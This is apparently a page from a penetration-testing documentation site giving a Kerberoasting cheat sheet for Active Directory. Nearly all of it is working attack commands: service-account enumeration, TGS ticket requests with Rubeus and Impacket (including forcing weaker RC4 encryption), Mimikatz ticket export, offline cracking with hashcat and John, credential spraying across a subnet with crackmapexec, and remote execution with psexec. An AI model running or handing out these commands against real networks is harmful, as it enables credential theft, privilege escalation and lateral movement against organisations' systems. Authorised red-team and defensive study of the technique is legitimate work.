Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

Kerberoasting requests TGS tickets for service accounts (accounts with SPNs), then cracks them offline. Any domain user can request TGS tickets — no special privileges needed.

Find Service Accounts (SPNs)

PowerShell (No Tools)

setspn -Q */*

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName | Select Name, ServicePrincipalName

PowerView

Get-DomainUser -SPN | Select samaccountname, serviceprincipalname

Request TGS Tickets

PowerShell (No Tools)

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/db01.target.local:1433"

Rubeus

Rubeus.exe kerberoast /outfile:hashes.txt
Target specific user: 
Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.txt
RC4 only (easier to crack): 
Rubeus.exe kerberoast /tgtdeleg /outfile:hashes.txt

Impacket (Remote from Linux)

impacket-GetUserSPNs target.local/user:password -dc-ip DC_IP -request -outputfile hashes.txt

Extract from Memory

Mimikatz

kerberos::list /export
Exports .kirbi files. Convert to hashcat format: 
kirbi2john.py ticket.kirbi > hash.txt

Crack TGS Hashes

Hashcat

# Type 23 — RC4 (krb5tgs$23$)
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt

# Type 17 — AES128
hashcat -m 19600 hashes.txt /usr/share/wordlists/rockyou.txt

# Type 18 — AES256
hashcat -m 19700 hashes.txt /usr/share/wordlists/rockyou.txt

John

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

Post-Exploitation

Cracked service account password → check privileges: 
# Test credentials
crackmapexec smb TARGET -u svc_account -p 'CrackedPassword'

# Check if local admin anywhere
crackmapexec smb SUBNET/24 -u svc_account -p 'CrackedPassword'

# PSExec if admin
impacket-psexec target.local/svc_account:'CrackedPassword'@TARGET

Quick Reference

ToolWhereNotes
setspnTarget (Windows)Built-in, no download
RubeusTarget (Windows)Most features, .NET
GetUserSPNsAttacker (Linux)Remote, needs creds
MimikatzTarget (Windows)Export from memory